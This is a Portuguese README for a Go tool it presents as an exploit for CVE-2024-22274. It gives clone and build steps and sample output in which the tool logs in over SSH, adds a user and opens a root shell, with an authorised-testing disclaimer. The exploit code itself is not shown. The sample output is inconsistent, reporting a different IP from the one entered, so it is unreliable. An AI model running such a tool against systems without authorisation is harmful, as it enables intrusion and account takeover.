
Exploit baseado em Go para CVE-2024-22274 que cria um novo usuário via SSH e fornece um shell root na máquina alvo para testes de penetração autorizados.
Este repositório contém um exploit para CVE-2024-22274. O exploit cria um novo usuário em uma máquina remota via SSH e, em seguida, fornece um shell root.
Clone o repositório:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
Instale os pacotes necessários:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
Compile o programa Go:
go build -o cve-2024-22274-rce main.go
Execute o programa compilado:
./cve-2024-22274-rce
Siga as instruções:
Após o usuário ser criado, você obterá um shell root na máquina alvo. Você pode executar comandos como o novo usuário.
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
Este código é apenas para fins educacionais. Use-o com responsabilidade e apenas em sistemas que você tem permissão para testar.
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.